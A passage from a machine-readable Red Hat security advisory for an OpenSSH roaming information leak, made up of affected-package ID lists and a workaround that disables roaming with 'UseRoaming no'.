"7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2016:0043" }, { "category": "workaround", "details": "1. The vulnerable roaming code can be permanently disabled by adding the\nundocumented option \"UseRoaming no\" to the system-wide configuration\nfile (usually /etc/ssh/ssh_config), or per-user configuration file\n(~/.ssh/config), or command-line (-o \"UseRoaming no\").\n\n2. If an OpenSSH client is disconnected from an SSH server that offers\nroaming, it prints \"[connection suspended, press return to resume]\" on\nstderr, and waits for \u0027\\n\u0027 or \u0027\\r\u0027 on stdin (and not on the controlling\nterminal) before it reconnects to the server; advanced users may become\nsuspicious and press Control-C or Control-Z instead, thus avoiding the\ninformation leak.\n\nHowever, SSH commands that use the local stdin to transfer data to the\nremote server are bound to trigger this reconnection automatically (upon\nreading a \u0027\\n\u0027 or \u0027\\r\u0027 from stdin). Moreover, these non-interactive SSH\ncommands (for example, backup scripts and cron jobs) commonly employ\npublic-key authentication and are therefore perfect targets for this\ninformation leak.", "product_ids": [ "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", 